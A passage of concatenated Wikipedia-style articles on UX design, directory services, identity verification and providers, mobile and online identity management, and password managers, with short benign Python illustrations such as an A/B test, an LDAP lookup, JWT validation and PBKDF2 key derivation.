manual. Since then the term has spread widely, so much so that it is starting to lose its meaning." User experience design draws from design approaches like human-computer interaction and user-centered design, and includes elements from similar disciplines like interaction design, visual design, information architecture, user research, and others. Another portion of the research is understanding the end user and the purpose of the application. Though this might seem clear to the designer, stepping back and empathizing with the user will yield the best results. It helps to identify and prove or disprove assumptions, find commonalities across target audience members, and recognize their needs, goals, and mental models. Visual design, also commonly known as graphic design, user interface design, communication design, and visual communication, represents the aesthetics or look-and-feel of the front end of any user interface. Graphic treatment of interface elements is often perceived as the visual design. The purpose of visual design is to use visual elements like colors, images, and symbols to convey a message to its audience. Fundamentals of Gestalt psychology and visual perception give a cognitive perspective on how to create effective visual communication.[7] Information architecture is the art and science of structuring and organizing the information in products and services to support usability and findability.[8] In the context of information architecture, information is separate from both knowledge and data, and lies nebulously between them. It is information about objects.[9] The objects can range from websites, to software applications, to images et al.
It is also concerned with metadata: terms used to describe and represent content objects such as documents, people, processes, and organizations. Information architecture also encompasses how the pages and navigation are structured.[10] Interaction design is an essential part of user experience (UX) design, centering on the interaction between users and products.[11] The goal of interaction design is to create a product that produces an efficient and delightful end-user experience by enabling users to achieve their objectives in the best way possible.[12][13] The growing emphasis on user-centered design and the strong focus on enhancing user experience have made interaction designers essential in shaping products that align with user expectations and adhere to the latest UI patterns and components.[14] In the last few years, the role of the interaction designer has shifted from being focused solely on specifying UI components and communicating them to the engineers to a situation in which designers have more freedom to design contextual interfaces that help meet the user's needs.[15] Therefore, user experience design evolved into a multidisciplinary design branch that involves multiple technical aspects, from motion graphics design and animation to programming. Usability is the extent to which a product can be used by specified users to achieve specified goals with effectiveness, efficiency and satisfaction in a specified context of use.[16] Usability applies to all tools used by humans and extends to both digital and non-digital devices. Thus, it overlaps with user experience but is not wholly contained within it. The section of usability that intersects with user experience design relates to humans' ability to use a system or application. Good usability is essential to a positive user experience but does not alone guarantee it.[17] Accessibility of a system describes its ease of reach, use, and understanding. In terms of user experience design, it can also be related to the overall comprehensibility of the information and features. It helps shorten the learning curve associated with the system. Accessibility in many contexts can be related to the ease of use for people with disabilities and comes under usability.[18] In addition, accessible design is the concept of services, products, or facilities in which designers accommodate and consider the needs of people with disabilities. The Web Content Accessibility Guidelines (WCAG) state that all content must adhere to the four main principles of POUR: Perceivable, Operable, Understandable, and Robust.[19] Web Content Accessibility Guidelines (WCAG) 2.0 covers a wide range of recommendations for making Web content more accessible, which makes web content more usable to users in general.[20] Making content more usable and readily accessible to all types of users enhances a user's overall user experience. Human–computer interaction is concerned with the design, evaluation and implementation of interactive computing systems for human use and with the study of major phenomena surrounding them.[21] After research, the designer uses the modeling of the users and their environments. User modeling or personas are composite archetypes based on behavior patterns uncovered during research.
Personas provide designers a precise way of thinking and communicating about how groups of users behave, how they think, what they want to accomplish, and why.[22] Once created, personas help the designer to understand the users' goals in specific contexts, which is particularly useful during ideation and for validating design concepts. Other types of models include workflow models, artifact models, and physical models. When the designer has a solid understanding of the user's needs and goals, they begin to sketch out the interaction framework (also known as wireframes). This stage defines the high-level structure of screen layouts, as well as the product's flow, behavior, and organization. Many kinds of materials can be involved during this iterative phase, from whiteboards to paper prototypes. As the interaction framework establishes an overall structure for product behavior, a parallel process focuses on the visual and industrial design. The visual design framework defines the experience attributes, visual language, and visual style.[23] Once a solid and stable framework is established, wireframes are translated from sketched storyboards to full-resolution screens that depict the user interface at the pixel level. At this point, it is critical for the programming team to collaborate closely with the designer. Their input is necessary to create a finished design that can and will be built while remaining true to the concept.[citation needed] Usability testing is carried out by giving users various tasks to perform on the prototypes. Any issues or problems faced by the users are collected as field notes, and these notes are used to make changes in the design and reiterate the testing phase.[24] Aside from monitoring issues, questions asked by users are also noted in order to identify potential points of confusion. Usability testing is, at its core, a means to "evaluate, not create".[25] UX designers perform a number of different tasks and, therefore, use a range of deliverables to communicate their design ideas and research findings to stakeholders.[26] Regarding UX specification documents, the requirements depend on the client or the organization involved in designing a product. The four major deliverables are: a title page, an introduction to the feature, wireframes, and a version history.[27] Depending on the type of project, the specification documents can also include flow models, cultural models, personas, user stories, scenarios, and any prior user research.[26] The deliverables that UX designers produce as part of their job include wireframes, prototypes, user flow diagrams, specification and tech docs, websites and applications, mockups, presentations, personas, user profiles, videos, and, to a lesser degree, reports.[28] Documenting design decisions, in the form of annotated wireframes, gives the developer the necessary information they may need to successfully code the project.[29] A user experience designer is considered a UX practitioner, along with the following job titles: user experience researcher, information architect, interaction designer, human factors engineer, business analyst, consultant, creative director, interaction architect, and usability specialist.[31] Interaction designers (IxD) are responsible for understanding and specifying how the product should behave. This work overlaps with the work of both visual and industrial designers in a couple of important ways.
When designing physical products, interaction designers must work with industrial designers early on to specify the requirements for physical inputs and to understand the behavioral impacts of the mechanisms behind them. Interaction designers cross paths with visual designers throughout the project. Visual designers guide the discussions of the brand and emotive aspects of the experience, while interaction designers communicate the priority of information, flow, and functionality in the interface.[32] Historically, technical and professional communication (TPC) has been an industry that practices writing and communication. However, recently UX design has become more prominent in TPC as companies look to develop content for a wide range of audiences and experiences.[33] It is now an expectation that technical and professional skills should be coupled with UX design. According to Verhulsdonck, Howard, and Tham, "...it is not enough to write good content. According to industry expectations, next to writing good content, it is now also crucial to design good experiences around that content."[33] Technical communicators must now consider different platforms such as social media and apps, as well as different channels like web and mobile.[33] In a similar manner, coupling TPC with UX design allows technical communicators to garner evidence on target audiences. UX writers, a branch of technical communicators, specialize in crafting content for mobile platforms while executing a user-centered approach. UX writers focus on developing content to guide users through interfaces, applications, and websites. Their responsibilities include maintaining UI text, conducting user research for usability testing, and developing the tone for a product's communication.[34] UX writers maintain the practices of technical communicators by developing documentation that establishes consistency in terminology and tone, promoting a cohesive user experience. Beyond the writing, UX writers also maintain UI text by ensuring that microcopy, such as button labels, error messages, and tooltips, remains user-friendly. In doing this, the writers are also tasked with ensuring accessibility – considering issues like screen reader compatibility or providing alternatives for non-text elements, such as icons. UX writers conduct extensive research to understand the behaviors and preferences of the target audience through user testing and feedback analysis. These methods of research can include user persona creation and user surveys. Lastly, when setting the tone in a product's communication, UX writers highlight factors that affect user engagement and perception. In short, the writers consider the product's emotional impact on the users and align the tone with the brand's personality.[34][35] Within the field of UX design, UX writers bridge the gaps between various fields to create a cohesive and user-centric experience. Their expertise in language and communication works to unify design, development, and user research teams by ensuring that the user interface's content aligns with the broader objectives of the product or service. By focusing on clarity, consistency, and empathy, UX writers contribute to the integration of design elements, technical functionality, and user preferences, while following a design process to ensure products with intuitive, accessible, and responsive behavior to user needs.[36] User interface (UI) design is the process of making interfaces in software or computerized devices with a focus on looks or style.
Designers aim to create designs users will find easy to use and pleasurable. UI design typically refers to graphical user interfaces but also includes others, such as voice-controlled interfaces.[37] The visual designer ensures that the visual representation of the design effectively communicates the data and hints at the expected behavior of the product. At the same time, the visual designer is responsible for conveying the brand ideals in the product and for creating a positive first impression; this responsibility is shared with the industrial designer if the product involves hardware. In essence, a visual designer must aim for maximum usability combined with maximum desirability. A visual designer need not have strong artistic skills but must deliver the theme in a desirable manner.[38] Usability testing is the most common method designers use to test their designs. The basic idea behind conducting a usability test is to check whether the design of a product or brand works well with the target users. Usability testing is about testing whether the product's design is successful and, if not, how it can be improved. While designers conduct tests, they are not testing the user but the design. Further, every design is evolving, with both UX design and design thinking moving in the direction of agile software development.[39] Designers carry out usability testing as early and as often as possible, ensuring that every aspect of the final product has been tested.[40] Usability tests play an important role in the delivery of a cohesive final product; however, a variety of factors influence the testing process. Evaluating qualitative and quantitative methods provides an adequate picture of UX designs, and one of these quantitative methods is A/B testing (see usability testing); a simple sketch of A/B analysis follows below. Another key concept in the efficacy of UX design testing is the idea of a persona, the representation of the most common user of a certain website or program, and how these personas would interact with the design in question.[41] At the core of UX design usability testing is the user; however, steps toward automating design testing have been made, with Micron developing the Advanced Test Environment (ATE), which automates UX tests on Android-powered smartphones. While quantitative software tools that collect actionable data, such as loggers and mobile agents, provide insight into a user's experience, the qualitative responses that arise from live, user-based UX design testing are lost. The ATE serves to simulate a device's movement, which affects design orientation and sensor operation, in order to estimate the actual experience of the user based on previously collected user testing data.[42]
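As a concrete illustration of the A/B testing mentioned above, the sketch below runs a two-proportion z-test on hypothetical conversion counts for two design variants. The counts and the 0.05 significance threshold are invented assumptions; real studies would also consider sample-size planning and multiple comparisons.

```python
import math

def two_proportion_z_test(conv_a: int, n_a: int, conv_b: int, n_b: int) -> float:
    """Return the two-sided p-value for H0: both variants convert at the same rate."""
    p_a, p_b = conv_a / n_a, conv_b / n_b
    pooled = (conv_a + conv_b) / (n_a + n_b)
    se = math.sqrt(pooled * (1 - pooled) * (1 / n_a + 1 / n_b))
    z = (p_a - p_b) / se
    return math.erfc(abs(z) / math.sqrt(2))  # two-sided p-value from the z statistic

# Hypothetical results: variant A converted 120/2000 users, variant B 162/2000.
p_value = two_proportion_z_test(120, 2000, 162, 2000)
print(f"p-value = {p_value:.4f}")
if p_value < 0.05:
    print("Difference is statistically significant at the 5% level.")
else:
    print("No significant difference detected; keep testing or rethink the variants.")
```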
https://en.wikipedia.org/wiki/User_experience_design
Human–city interaction is the intersection between human-computer interaction and urban computing. The area involves data-driven methods, such as analysis tools and prediction methods, to develop solutions to urban design problems. Practitioners, designers, and software engineers in this area employ large sets of user-centric data to design urban environments with high levels of interactivity.[1] This discipline mainly focuses on the user perspective and devises various interaction designs between the citizen (user) and urban entities. Common examples in the discipline include interactivity between humans and buildings,[2] interaction between humans and IoT devices,[3] participatory and collective urban design,[4] and so on. The discipline attracts growing interest from people of various backgrounds, such as designers, urban planners, computer scientists, and even architects. Although the design canvas between human and city is broad, Lee et al. proposed a framework considering the multi-disciplinary interests (urban, computers, and human) together,[5] in which emerging technologies such as extended reality (XR) can serve as a platform for such co-design purposes.[6]
https://en.wikipedia.org/wiki/Human_City_Interaction
In computing, a directory service or name service maps the names of network resources to their respective network addresses. It is a shared information infrastructure for locating, managing, administering and organizing everyday items and network resources, which can include volumes, folders, files, printers, users, groups, devices, telephone numbers and other objects. A directory service is a critical component of a network operating system. A directory server or name server is a server which provides such a service. Each resource on the network is considered an object by the directory server. Information about a particular resource is stored as a collection of attributes associated with that resource or object (a minimal code sketch of this model appears below). A directory service defines a namespace for the network. The namespace is used to assign a name (unique identifier) to each of the objects. Directories typically have a set of rules determining how network resources are named and identified, which usually includes a requirement that the identifiers be unique and unambiguous. When using a directory service, a user does not have to remember the physical address of a network resource; providing a name locates the resource. Some directory services include access control provisions, limiting the availability of directory information to authorized users. Several things distinguish a directory service from a relational database. For example, data can be made redundant if it aids performance (e.g. by repeating values through rows in a table instead of relating them to the contents of a different table through a key, a technique called denormalization; another technique is the use of replicas for increasing actual throughput).[1] Directory schemas consist of object classes, attributes, name bindings and knowledge (namespaces), where an object class has an identifier together with lists of mandatory (must) and optional (may) attributes. Attributes are sometimes multi-valued, allowing multiple naming attributes at one level (such as the concatenation of machine type and serial number, or multiple phone numbers for "work phone"). Attributes and object classes are usually standardized throughout the industry; for example, X.500 attributes and classes are often formally registered with the IANA for their object ID.[citation needed] Therefore, directory applications try to reuse standard classes and attributes to maximize the benefit of existing directory-server software. Object instances are slotted into namespaces; each object class inherits from its parent object class (and ultimately from the root of the hierarchy), adding attributes to the must-may list. Directory services are often central to the security design of an IT system and have a correspondingly fine granularity of access control. Replication and distribution have distinct meanings in the design and management of a directory service. Replication is used to indicate that the same directory namespace (the same objects) is copied to another directory server for redundancy and throughput reasons; the replicated namespace is governed by the same authority. Distribution is used to indicate that multiple directory servers in different namespaces are interconnected to form a distributed directory service; each namespace can be governed by a different authority. Directory services were part of an Open Systems Interconnection (OSI) initiative for common network standards and multi-vendor interoperability. During the 1980s, the ITU and ISO created the X.500 set of standards for directory services, initially to support the requirements of inter-carrier electronic messaging and network-name lookup.
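To make the "named object with attributes" model concrete, here is a minimal in-memory sketch; it illustrates the data model only, not any real directory server. Names act as unique identifiers in a namespace, each name maps to a multi-valued attribute set, and lookup by name replaces remembering a physical address. All names and attribute values below are placeholders.

```python
from typing import Dict, List

# A toy namespace: each distinguished name maps to a multi-valued attribute set.
directory: Dict[str, Dict[str, List[str]]] = {
    "cn=print01,ou=printers,dc=example,dc=com": {
        "objectClass": ["device", "printer"],
        "networkAddress": ["10.0.4.17"],
        "location": ["2nd floor, east wing"],
    },
    "cn=jdoe,ou=people,dc=example,dc=com": {
        "objectClass": ["person"],
        "telephoneNumber": ["+1-555-0100", "+1-555-0199"],  # multi-valued attribute
        "mail": ["jdoe@example.com"],
    },
}

def lookup(name: str) -> Dict[str, List[str]]:
    """Resolve a name to its attribute set; names are unique in the namespace."""
    return directory[name]

# A user supplies only the name; the service returns the resource's attributes,
# including its network address.
print(lookup("cn=print01,ou=printers,dc=example,dc=com")["networkAddress"])
```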
The Lightweight Directory Access Protocol (LDAP) is based on the X.500 directory-information services, using the TCP/IP stack and an X.500 Directory Access Protocol (DAP) string-encoding scheme on the Internet. A number of directory systems were developed before X.500, and many LDAP/X.500-based implementations now exist. Open-source tools to create directory services include OpenLDAP, the Kerberos protocol and Samba software, which can function as a Windows domain controller with Kerberos and LDAP back ends. Administration is by GOsa or Samba SWAT. Name services on Unix systems are typically configured through nsswitch.conf. Information from name services can be retrieved with getent.
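As a brief illustration of querying such services programmatically, the sketch below uses the third-party ldap3 library; this is an assumption (the library must be installed, and the host ldap.example.com, base DN, and uid are placeholders, not a real server). It then shows that Python's standard pwd module resolves users through the same NSS machinery that nsswitch.conf configures and getent queries.

```python
# pip install ldap3  (assumed third-party dependency)
from ldap3 import Server, Connection, ALL

# Placeholder host and DNs; substitute a reachable directory server.
server = Server("ldap.example.com", get_info=ALL)
with Connection(server, auto_bind=True) as conn:  # anonymous bind for the sketch
    conn.search(
        search_base="dc=example,dc=com",
        search_filter="(uid=jdoe)",  # a name lookup, much like getent passwd jdoe
        attributes=["cn", "mail", "telephoneNumber"],
    )
    for entry in conn.entries:
        print(entry.entry_dn, entry.mail)

# The standard library's pwd module goes through NSS (per /etc/nsswitch.conf),
# so this is roughly the programmatic equivalent of `getent passwd root`.
import pwd
print(pwd.getpwnam("root"))
```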
https://en.wikipedia.org/wiki/Directory_service
An identity verification service is used by businesses to ensure that users or customers provide information that is associated with the identity of a real person. The service may verify the authenticity of physical identity documents such as a driver's license, passport, or a nationally issued identity document through documentary verification. It may also involve the verification of identity information (fields) against independent and authoritative sources, such as a credit bureau or proprietary government data. Identity verification services were developed to help companies comply with Anti-Money Laundering (AML) and Know Your Customer (KYC) rules; identity verification is now a vital component of the transaction ecosystems of eCommerce companies, financial institutions, online gaming, and even social media. By adopting digital fraud prevention methods, businesses can achieve AML and KYC compliance while addressing the risks associated with fraud.[1] In financial industries, verifying identity is often required by regulations known as Know Your Customer or Customer Identification Program. In the US, one of the many bodies regulating these procedures is the Financial Crimes Enforcement Network (FinCEN). The Financial Action Task Force (FATF) is a global anti-money laundering and terrorist financing watchdog organization. A nondocumentary identity verification requires the user or customer to provide personal identity data, which is sent to the identity verification service.[2] The service checks public and proprietary private databases for a match on the information provided. Optionally, knowledge-based authentication questions can be presented to the person providing the information to ensure that he or she is the owner of the identity. An identity "score" is calculated, and the identity of the user or customer is either given "verified" status or not, based on the score (a toy sketch of such scoring appears below). Customers of various businesses, such as retail merchants, government entities, or financial institutions, are often required to present identification to complete a transaction. For instance, a merchant may require customer identification for various types of purchases (e.g., alcohol, lottery, or tobacco purchases) or when certain types of payments (e.g., checks, credit cards) are presented to pay for transactions. Financial institutions usually require customers to present a form of identification to complete a withdrawal or deposit transaction, cash a check, or open a new account. Government entities may require identification for access into secure areas or other purposes. Other businesses may also require identification from customers. An additional method of identity verification that is gaining industry prominence is artificial intelligence, more commonly referred to as artificial intelligence–based identity verification.[citation needed] ID verification is performed through a webcam, and the results are available in real time and are more accurate than the untrained eye.[3] However, there have been concerns about Eurocentric bias in artificial intelligence[4] and how that could affect the accuracy of results. Industries that use identity verification services include financial services, digital businesses, travel and leisure, sharing economy businesses, telecom, FinTech, gaming and entertainment.[5] Identity verification services exist both online and in person.
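The nondocumentary flow described above boils down to matching submitted fields against authoritative records and thresholding a score. The following toy sketch illustrates only that shape; the fields, weights, and the 0.8 threshold are invented assumptions, and production systems use far richer data sources, fuzzy matching, and models.

```python
# Per-field weights: how strongly a match on that field supports the identity.
# These weights and the threshold are illustrative assumptions only.
FIELD_WEIGHTS = {"name": 0.2, "date_of_birth": 0.3, "address": 0.2, "ssn_last4": 0.3}
VERIFIED_THRESHOLD = 0.8

def identity_score(submitted: dict, authoritative: dict) -> float:
    """Sum the weights of fields that exactly match the authoritative record."""
    return sum(
        weight
        for field, weight in FIELD_WEIGHTS.items()
        if submitted.get(field) and submitted.get(field) == authoritative.get(field)
    )

record = {"name": "Jane Doe", "date_of_birth": "1990-01-31",
          "address": "12 Elm St", "ssn_last4": "6789"}
claim = {"name": "Jane Doe", "date_of_birth": "1990-01-31",
         "address": "12 Elm Street",  # near-miss: naive exact matching fails here
         "ssn_last4": "6789"}

score = identity_score(claim, record)
status = "verified" if score >= VERIFIED_THRESHOLD else "not verified"
print(f"score = {score:.2f} -> {status}")
```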
These services are used in the financial service industry, e-commerce platforms, social networking sites, Internet forums, dating sites, and wikis to curb sockpuppetry, underage signups, spamming, and illegal activities like harassment, identity fraud, and money laundering. For example, in banking, identity verification may be required in order to open a bank account. There is an increasing call for regulation with the rise in popularity of cryptocurrency exchanges. In December 2020 the U.S. government's Financial Crimes Enforcement Network (FinCEN) proposed rules to require banks and money service businesses ("MSBs") such as cryptocurrency wallets to submit reports, keep records, and verify the identity of users who perform transactions with convertible virtual currency.[6][7]
https://en.wikipedia.org/wiki/Identity_verification_service
An identity provider (abbreviated IdP or IDP) is a system entity that creates, maintains, and manages identity information for principals and also provides authentication services to relying applications within a federation or distributed network.[1] Identity providers offer user authentication as a service. Relying party applications, such as web applications, outsource the user authentication step to a trusted identity provider. Such a relying party application is said to be federated, that is, it consumes federated identity. An identity provider is "a trusted provider that lets you use single sign-on (SSO) to access other websites." SSO enhances usability by reducing password fatigue. It also provides better security by decreasing the potential attack surface. Identity providers can facilitate connections between cloud computing resources and users, thus decreasing the need for users to re-authenticate when using mobile and roaming applications.[citation needed] OpenID Connect (OIDC) is an identity layer on top of OAuth. In the domain model associated with OIDC, an identity provider is a special type of OAuth 2.0 authorization server. Specifically, a system entity called an OpenID Provider issues JSON-formatted identity tokens to OIDC relying parties via a RESTful HTTP API (validation of such a token is sketched below). The Security Assertion Markup Language (SAML) is a set of profiles for exchanging authentication and authorization data across security domains. In the SAML domain model, an identity provider is a special type of authentication authority. Specifically, a SAML identity provider is a system entity that issues authentication assertions in conjunction with an SSO profile of SAML. A relying party that consumes these authentication assertions is called a SAML service provider.[citation needed]
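To ground the OIDC description above: the identity token an OpenID Provider issues is a signed JWT that the relying party must validate before trusting its claims. The sketch below uses the third-party PyJWT library; this is an assumption (it must be installed), and the token, key, issuer, and client ID are placeholders. Real deployments fetch the provider's signing keys from its published JWKS endpoint rather than hard-coding them.

```python
# pip install pyjwt  (assumed third-party dependency)
import jwt

def validate_id_token(id_token: str, signing_key: str,
                      issuer: str, client_id: str) -> dict:
    """Verify signature, issuer, audience, and expiry; return the identity claims."""
    return jwt.decode(
        id_token,
        key=signing_key,
        algorithms=["RS256"],   # reject unsigned or algorithm-downgraded tokens
        issuer=issuer,          # must be the OpenID Provider we trust
        audience=client_id,     # token must be intended for this relying party
    )

# Placeholder values; a real relying party gets these from its OIDC registration
# and from the provider's JWKS endpoint. With placeholders, validation fails,
# which the try/except below demonstrates.
try:
    claims = validate_id_token(
        id_token="eyJ...",                      # token returned by the provider
        signing_key="-----BEGIN PUBLIC KEY-----...",
        issuer="https://idp.example.com",
        client_id="my-client-id",
    )
    print(claims["sub"], claims.get("email"))   # 'sub' identifies the principal
except jwt.InvalidTokenError as exc:
    print("token rejected:", exc)
```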
https://en.wikipedia.org/wiki/Identity_provider
Mobile identity is a development of online authentication and digital signatures, where the SIM card of one's mobile phone works as an identity tool. Mobile identity enables legally binding authentication and transaction signing for online banking, payment confirmation, corporate services, and consuming online content. The user's certificates are maintained on the telecom operator's SIM card, and in order to use them, the user has to enter a personal, secret PIN code. When using mobile identity, no separate card reader is needed, as the phone itself already performs both functions. In contrast to other approaches, the mobile phone in conjunction with a mobile signature-enabled SIM card aims to offer the same security and ease of use as, for example, smart cards in existing digital identity management systems. Smart card-based digital identities can only be used in conjunction with a card reader and a PC. In addition, distributing and managing the cards can be logistically difficult, exacerbated by the lack of interoperability between services relying on such a digital identity.[citation needed] There are a number of private company stakeholders that have an inherent interest in setting up a mobile signature service infrastructure to offer mobile identity services. These stakeholders are mobile network operators and, to a certain extent, financial institutions or service providers with an existing large customer base, which could leverage the use of mobile signatures across several applications. The Finnish government has supervised the deployment of a common derivative of the ETSI-based mobile signature service standard, thus allowing the Finnish mobile operators to offer mobile signature services. The Finnish government certificate authority (CA) also issues the certificates that link the digital keys on the SIM card to the person's real-world identity.[1][2][3] Through a national mobile registration program, the Iranian customs administration and the Ministry of ICT maintain a database of the IMEIs of legally imported phones; Iranian citizens receive full access to the national roaming networks of Iranian mobile phone operators only if they have linked their national ID to their SIM cards and to a non-contraband (non-smuggled) IMEI number.[4] In the Nordic region, governments, the public sector and financial institutions are increasingly offering online and mobile channels to access their services. In Sweden, the WPK consortium, owned by banks and mobile operators, specifies a mobile signature service infrastructure that is used by banks to authenticate online banking users. Telenor Sverige has provided technology for the company's mobile signature services in Sweden since 2009. Telenor enables its customers to log in securely to online services using their mobile phone for authentication and digital signing.[5] The Estonian government issues all citizens a smart card and digital identity called the Estonian ID card. Additionally, Sertifitseerimiskeskus, the certificate authority of Estonia, issues special SIM cards for mobile phones which act as a national personal identification method. The service is called m-id.
In 2007, the mobile operator Turkcell bought a mobile signature service infrastructure from Gemalto and launched MobilImza, the world's first mobile signature solution.[6][7] They have partnered with over 200 businesses, including many banks, to enable them to use mobile signatures for online user authentication.[8] Other services relying on mobile signatures in Turkey include securing the withdrawal of small loans from an ATM, and processing custom workflow processes by enabling applicants to use mobile signatures.[9][10][11][12] The Austrian government allows private sector companies to propose means for storing the government-controlled digital identity. Since 2006, the Austrian government has explicitly mentioned mobile phones as one of the likely devices to be used for storing and managing a digital identity. Eight Austrian savings banks will launch[when?] a pilot allowing online user authentication with mobile signatures.[13] In Ukraine, the Mobile ID project started in 2015 and was later declared one of the Government of Ukraine's priorities supported by the EU. At the beginning of 2018, Ukrainian cell operators were evaluating proposals and testing platforms from different local and foreign developers, with platform selection to be followed by a comprehensive certification process. Ukrainian IT and cryptography work around Mobile ID is mostly represented by Innovation Development HUB LLC with its own Mobile ID platform; this particular solution is the sole one to have already passed certification, and it is the most likely to be implemented in Ukraine. As of September 2019, all of the 'big three' cell operators in Ukraine have launched a Mobile ID service: Vodafone (commercial launch in August 2018), Kyivstar (commercial launch in December 2018), and Lifecell (commercial launch in August 2019). The Vodafone and Lifecell operators implemented a Mobile ID solution of Ukrainian origin designed by Innovation Development HUB LLC.
https://en.wikipedia.org/wiki/Mobile_identity_management
Online identity management (OIM), also known as online image management, online personal branding, or personal reputation management (PRM), is a set of methods for generating a distinguished web presence of a person on the Internet. Online identity management also refers to identity exposure and identity disclosure, and has particularly developed in the management of online identity in social network services or online dating services.[1][2] Identity management is also an important building block of cybersecurity. It forms the basis for most access control types and for establishing accountability online.[3] One aspect of the online identity management process has to do with improving the quantity and quality of traffic to sites that have content related to a person. In that aspect, OIM is a part of another discipline called search engine optimization, with the differences that the only keyword is the person's name, and that the optimization object is not necessarily a single web site; it can consider a set of completely different sites that contain positive online references. The objective in this case is to get high rankings for as many sites as possible when someone searches for a person's name. If the search engine used is Google, this action is called "to google someone".[4] Another aspect has to do with impression management, i.e. "the process through which people try to control the impressions other people form of them". One of the objectives, in particular, is to increase the online reputation of the person. Pseudonyms are sometimes used to protect the true online identity of individuals from harm. This can be the case when presenting unpopular views or dissenting opinions online in a way that will not affect the true identity of the author. Facebook estimates that up to 11.2% of accounts are fake.[5] Many of these profiles are used as logins to protect the true identity of online authors.[citation needed] An individual's presence could be reflected in any kind of content that refers to that person, including news, participation in blogs and forums, personal web sites,[6] social media presence, pictures, video, etc. Because of that, online identity management often involves participation in social media sites like Facebook, Google+, LinkedIn, Flickr, YouTube, Twitter, Last.fm, Myspace, Quora, Tumblr, Pinterest and other online communities and community websites, and is related to blogging, blog social networks like MyBlogLog and blog search engines like Technorati. OIM can serve specific purposes such as a professional networking platform. OSN platforms represent who the user is and what attributes they bring to the world. The information a user can plug into their profile is usually not verified, which can lead to specific forms of false identity.[7] OIM can also consist of more questionable practices, such as buying "likes", "friends", or "subscribers".[8] Online identity management can be utilized on both a personal and a professional level. It uses a web presence to gain attention from audiences ranging from potential major clients to followers. A person managing an online identity will use social media sites such as Twitter, Facebook, Instagram, YouTube, and Snapchat, as well as networking sites, to increase their online activity. They also use other tools, like search engine optimization and advertisements, to grow their audience and gain insights about it. Online identity management is most effective when all relevant social networking sites are used and content is posted frequently.
This technique is used to target their audience and to make sure their audience does not miss any content. Additionally, online identity management can be used to manipulate followers, viewers, and clients by using misleading or over-exaggerated information.[10] The reason why someone would be interested in doing online identity management is closely related to the increasing number of constituencies that use the internet as a tool to find information about people. A survey by CareerBuilder.com found that one in four hiring managers used search engines to screen candidates. One in ten also checked candidates' profiles on social networking sites such as Facebook, Instagram, Twitter, YouTube, and other communication networks.[11] According to a December 2007 survey by the Ponemon Institute, a privacy research organization, roughly half of U.S. hiring officials use the Internet in vetting job applications.[12] Online identity management may also be used to increase an individual's professional online presence. A well-managed online identity gives employers a favorable impression of a candidate's professional attitude and personality, which may result in the candidate receiving the job on the strength of their professional online presence.[13] Online identity management is key to a successful business and a good relationship with the public. An online presence is vital in the digital world we live in today. Many employers check the social network accounts of their candidates to grasp the kind of person they are, and even after hiring, companies will continuously check accounts to ensure that professionalism and company privacy are maintained.[10] The concept of manipulating search results to show positive results is intriguing for both individuals and businesses. Individuals who want to hide from their past can use OIM to repair their online image and suppress content that damages their credibility, employability, and reputation. By changing what people see when searching for an individual, they are able to create a completely new and positive identity in its place. In 2014, the EU ruled that people have "the right to be forgotten", and that in some circumstances content can be removed from Google's search index. Earlier, the European Union had adopted safe harbor rules prohibiting the unauthorized sharing of personal information, and many companies voluntarily comply with these rules to this day; however, it remains the job of users to fully ensure the safety of their own online identity. The landmark 2014 ruling that all individuals have the "right to be forgotten" granted users the removal of irrelevant data that could harm their online identity.[13] Online identity management is also an important factor when a person is seeking a good or service: a company's online audience and content can encourage or discourage a sale, and decisions are made on the basis of online activity. Depending on the motives of the company, the goods, and the person, their online identity should serve the purpose of heightening their likability, attractiveness, and exposure.
https://en.wikipedia.org/wiki/Online_identity_management
A password manager is a software program that prevents password fatigue by automatically generating, autofilling and storing passwords.[1][2] It can do this for local applications or web applications such as online shops or social media.[3] Web browsers tend to have a built-in password manager. Password managers typically require a user to create and remember a single master password to unlock and access the stored passwords. Password managers can integrate multi-factor authentication. The first password manager software designed to securely store passwords was Password Safe created by Bruce Schneier, which was released as a free utility on September 5, 1997.[4] Designed for Microsoft Windows 95, Password Safe used Schneier's Blowfish algorithm to encrypt passwords and other sensitive data. Although Password Safe was released as a free utility, due to export restrictions on cryptography from the United States, only U.S. and Canadian citizens and permanent residents were initially allowed to download it.[4] As of October 2024[update], the built-in Google Password Manager in Google Chrome became the most used password manager.[5] Some applications store passwords as an unencrypted file, leaving the passwords easily accessible to malware or people attempting to steal personal information. Some password managers require a user-selected master password or passphrase to form the key used to encrypt the stored passwords for the application to read. The security of this approach depends on the strength of the chosen password (which may be guessed through malware), and also on the passphrase itself never being stored locally where a malicious program or individual could read it. A compromised master password may render all of the protected passwords vulnerable, meaning that a single point of entry can compromise the confidentiality of sensitive information. This is known as a single point of failure. While password managers offer robust security for credentials, their effectiveness hinges on the user's device security. If a device is compromised by malware like Raccoon, which excels at stealing data, the password manager's protections can be nullified. Malware like keyloggers can steal the master password used to access the password manager, granting full access to all stored credentials. Clipboard sniffers can capture sensitive information copied from the manager, and some malware might even steal the encrypted password vault file itself. In essence, a compromised device with password-stealing malware can bypass the security measures of the password manager, leaving the stored credentials vulnerable.[6] As with other password authentication techniques, key logging or acoustic cryptanalysis may be used to guess or copy the "master password". Some password managers attempt to use virtual keyboards to reduce this risk, though this is still vulnerable to key loggers that record the keystrokes and send what key was pressed to whoever is trying to access confidential information.[7] Cloud-based password managers offer a centralized location for storing login credentials. However, this approach raises security concerns. One potential vulnerability is a data breach at the password manager itself. If such an event were to occur, attackers could potentially gain access to a large number of user credentials. A 2022 security incident involving LastPass exemplifies this risk.[6] Some password managers may include a password generator.
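As a minimal sketch of the master-password approach described above, the snippet below derives an encryption key from a user-chosen passphrase with PBKDF2 from Python's standard library. The function name, salt handling, and iteration count are illustrative assumptions rather than any particular product's design, and the actual encryption of the vault (e.g., with AES) would require a third-party library and is omitted here.

```python
import hashlib
import os

def derive_vault_key(master_password: str, salt: bytes | None = None) -> tuple[bytes, bytes]:
    """Stretch a master password into a 32-byte key for encrypting the vault.

    A random salt ensures two users with the same password get different
    keys; the high iteration count slows down offline guessing attacks.
    """
    if salt is None:
        salt = os.urandom(16)  # stored alongside the vault; not secret
    key = hashlib.pbkdf2_hmac("sha256", master_password.encode(), salt, 600_000)
    return key, salt
```

Note that, as the text explains, the derived key is only as strong as the passphrase it stretches; key stretching slows guessing but cannot rescue a weak master password.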
